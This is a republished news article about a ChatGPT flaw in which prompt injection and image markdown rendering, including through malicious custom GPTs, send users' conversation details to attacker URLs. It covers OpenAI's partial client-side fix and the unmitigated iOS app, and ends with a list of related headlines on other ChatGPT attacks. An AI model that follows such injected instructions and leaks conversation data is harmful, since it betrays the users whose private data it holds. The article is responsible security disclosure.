OpenAI rolls out imperfect fix for ChatGPT data leak flaw

OpenAI has mitigated a data exfiltration bug in ChatGPT that could potentially leak conversation details to an external URL. According to the researcher who discovered the flaw, the mitigation isn't perfect, so attackers can still exploit it under certain conditions.
The safety checks are yet to be implemented in the iOS mobile app for ChatGPT, so the risk on that platform remains unaddressed.
Security researcher Johann Rehberger discovered a technique to exfiltrate data from ChatGPT and reported it to OpenAI in April 2023.
The researcher later shared in November 2023 additional information on creating malicious GPTs that leverage the flaw to phish users.
Hence it seems best to share this with the public to raise awareness.
The data theft involves image markdown rendering and prompt injection, so the attack requires the victim to submit a malicious prompt that the attacker directly supplied or posted somewhere for victims to discover and use.
A malicious GPT can be used, like Rehberger demonstrated, and users who use that GPT wouldn't realize their conversation details along with metadata and technical data are exfiltrated to third-parties.
After Rehberger publicized the flaw details on his blog, OpenAI responded to the situation and implemented client-side checks performed via a call to a validation API to prevent images from unsafe URLs from rendering.
The researcher notes that in some cases, ChatGPT still renders requests to arbitrary domains, so the attack could still work sometimes, with discrepancies observed even when testing the same domain.
Since specific details on the check that determines if a URL is safe are unknown, there's no way to know the exact cause of these discrepancies.
It's noted that exploiting the flaw is now more noisy, has data transfer rate limitations, and works a lot slower.
It is also mentioned that the client-side validation call has yet to be implemented on the iOS mobile app, so the attack remains 100% unmitigated there.
It is also unclear whether the fix was rolled out to the ChatGPT Android app, which counts over 10 million downloads on Google Play.
ChatGPT down after major outage impacting OpenAI systems.
OpenAI confirms it's not killing off ChatGPT plugins for now.
BidenCash darkweb market gives 1.9 million credit cards for free.
U.S. nuclear research lab data breach impacts 45,000 people.
Toyota warns customers of data breach exposing personal, financial info.


This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 21 Dec 2023 16:45:14 +0000


Cyber News related to OpenAI rolls out imperfect fix for ChatGPT data leak flaw

Sam Altman's Return As OpenAI CEO Is A Relief-and Lesson-For Us All - The sudden ousting of OpenAI CEO Sam Altman on Friday initially seemed to suggest one thing: he must have done something really, really bad. Possibly illegal. So when OpenAI's board of directors publicly announced that Altman was fired after "Failing ...
1 year ago Forbes.com
XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT - With its widespread use among businesses and individual users, ChatGPT is a prime target for attackers looking to access sensitive information. In this blog post, I'll walk you through my discovery of two cross-site scripting vulnerabilities in ...
1 year ago Imperva.com
OpenAI rolls out imperfect fix for ChatGPT data leak flaw - OpenAI has mitigated a data exfiltration bug in ChatGPT that could potentially leak conversation details to an external URL. According to the researcher who discovered the flaw, the mitigation isn't perfect, so attackers can still exploit it under ...
1 year ago Bleepingcomputer.com
How to perform a proof of concept for automated discovery using Amazon Macie | AWS Security Blog - After reviewing the managed data identifiers provided by Macie and creating the custom data identifiers needed for your POC, it’s time to stage data sets that will help demonstrate the capabilities of these identifiers and better understand how ...
5 months ago Aws.amazon.com
Google Researchers' Attack Prompts ChatGPT to Reveal Its Training Data - A team of researchers primarily from Google's DeepMind systematically convinced ChatGPT to reveal snippets of the data it was trained on using a new type of attack prompt which asked a production model of the chatbot to repeat specific words forever. ...
1 year ago 404media.co
How Are Security Professionals Managing the Good, The Bad and The Ugly of ChatGPT? - ChatGPT has emerged as a shining light in this regard. Already we're seeing the platform being integrated into corporate systems, supporting in areas such as customer success or technical support. The bad: The risks surrounding ChatGPT. Of course, ...
1 year ago Cyberdefensemagazine.com
How enterprises are using gen AI to protect against ChatGPT leaks - ChatGPT is the new DNA of shadow IT, exposing organizations to new risks no one anticipated. Enterprise workers are gaining a 40% performance boost thanks to ChatGPT based on a recent Harvard University study. A second study from MIT discovered that ...
1 year ago Venturebeat.com
Locking Down ChatGPT: A User's Guide to Strengthening Account Security - OpenAI officials said that the user who reported his ChatGPT history was a victim of a compromised ChatGPT account, which resulted in the unauthorized logins. OpenAI has confirmed that the unauthorized logins originate from Sri Lanka, according to an ...
1 year ago Cysecurity.news
OpenAI blocks state-sponsored hackers from using ChatGPT - OpenAI has removed accounts used by state-sponsored threat groups from Iran, North Korea, China, and Russia, that were abusing its artificial intelligence chatbot, ChatGPT. The AI research organization took action against specific accounts associated ...
1 year ago Bleepingcomputer.com Turla
ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store - On Android devices, one of the apps analyzed by researchers has more than 100,000 downloads, tracks, and shares location data with ByteDance and Amazon, etc. ChatGPT, the AI software, has already taken the Internet by storm, and that is why ...
2 years ago Hackread.com Everest
ChatGPT Extensions Could be Exploited to Steal Data and Sensitive Information - API security professionals Salt Security have released new threat research from Salt Labs highlighting critical security flaws within ChatGPT plugins, presenting a new risk for enterprises. Plugins provide AI chatbots like ChatGPT access and ...
1 year ago Itsecurityguru.org
OpenAI's board might have been dysfunctional-but they made the right choice. Their defeat shows that in the battle between AI profits and ethics, it's no contest - The drama around OpenAI, its board, and Sam Altman has been a fascinating story that raises a number of ethical leadership issues. What are the responsibilities that OpenAI's board, Sam Altman, and Microsoft held during these quickly moving events? ...
1 year ago Fortune.com Equation
Microsoft Invests Billions in OpenAI – Innovator in Chatbot and GPT Technology - Microsoft has announced a $1 billion investment in OpenAI, the San Francisco-based artificial intelligence (AI) research and development firm. Founded by tech moguls Elon Musk and Sam Altman, OpenAI is a leader in AI technology, and the investment ...
2 years ago Securityweek.com
Are you sure you want to share that with ChatGPT? How Metomic helps stop data leaks - Open AI's ChatGPT is one of the most powerful tools to come along in a lifetime, set to revolutionize the way many of us work. Workers aren't content to wait until organizations work this question out, however: Many are already using ChatGPT and ...
1 year ago Venturebeat.com
Google to Announce Chat-GPT Rival On February 8 Event - There seems to be a lot of consternation on Google's part at the prospect of a showdown with ChatGPT on the February 8 event. The search giant has been making moves that suggest it is preparing to enter the market for large language models, where ...
2 years ago Cybersecuritynews.com
Researchers Uncover Simple Technique to Extract ChatGPT Training Data - Can getting ChatGPT to repeat the same word over and over again cause it to regurgitate large amounts of its training data, including personally identifiable information and other data scraped from the Web? The answer is an emphatic yes, according to ...
1 year ago Darkreading.com
OpenAI's Sora Generates Photorealistic Videos - OpenAI released on Feb. 15 an impressive new text-to-video model called Sora that can create photorealistic or cartoony moving images from natural language text prompts. Sora isn't available to the public yet; instead, OpenAI released Sora to red ...
1 year ago Techrepublic.com
UK Scrutiny Of Microsoft Partnership With OpenAI - CMA seeks feedback about the relationship between Microsoft and OpenAI, and whether it has antitrust implications. Microsoft, it should be remembered, was firmly rebuked for its conduct by the CMA in October after the UK regulator reversed its ...
1 year ago Silicon.co.uk
OpenAI Reveals ChatGPT Is Being DDoS-ed - ChatGPT developer OpenAI has admitted the cause of intermittent outages across its flagship generative AI offering over the past day: distributed denial of service attacks. According to the developer's status page, ChatGPT and its API have been ...
1 year ago Infosecurity-magazine.com
Latest Information Security and Hacking Incidents - OpenAI has addressed significant security flaws in its state-of-the-art language model, ChatGPT, which has become widely used, in recent improvements. Although the business concedes that there is a defect that could pose major hazards, it reassures ...
1 year ago Cysecurity.news
The Emergence of AI In the Enterprise: Know the Security Risks - As is often the case with any new, emerging technology, using AI comes with security risks, and it's essential to understand them and impose the proper guardrails around them to protect company, customer, and employee data. There are real, tangible ...
1 year ago Cyberdefensemagazine.com
Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher - A researcher has shown how malicious actors could create custom GPTs that can phish for user credentials and exfiltrate the stolen data to an external server. Researchers Johann Rehberger and Roman Samoilenko independently discovered in the spring of ...
1 year ago Securityweek.com
OpenAI's New GPT Store May Carry Data Security Risks - A new kind of app store for ChatGPT may expose users to malicious bots, and legitimate ones that siphon their data to insecure, external locales. ChatGPT's fast rise in popularity, combined with the open source accessibility of the early GPT models, ...
1 year ago Darkreading.com
ChatGPT Maker OpenAI Raises $6.6bn In Funding | Silicon UK - Last week when OpenAI’s ‘for profit’ restructuring move was revealed, three senior executives abruptly announced they were departing, including Chief Technology Officer Mira Murati, VP Research Barret Zoph, and Chief Research ...
5 months ago Silicon.co.uk
New ChatGPT's Premium Features Subscription Phishing Attack Steal Logins - A typical message includes the subject line “Action Required: Secure Continued Access to ChatGPT with a $24 Monthly Subscription” and spoofs the sender address as noreply@chatgpt-auth[.]net—a domain registered through PrivacyGuardian.org just ...
1 month ago Cybersecuritynews.com

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)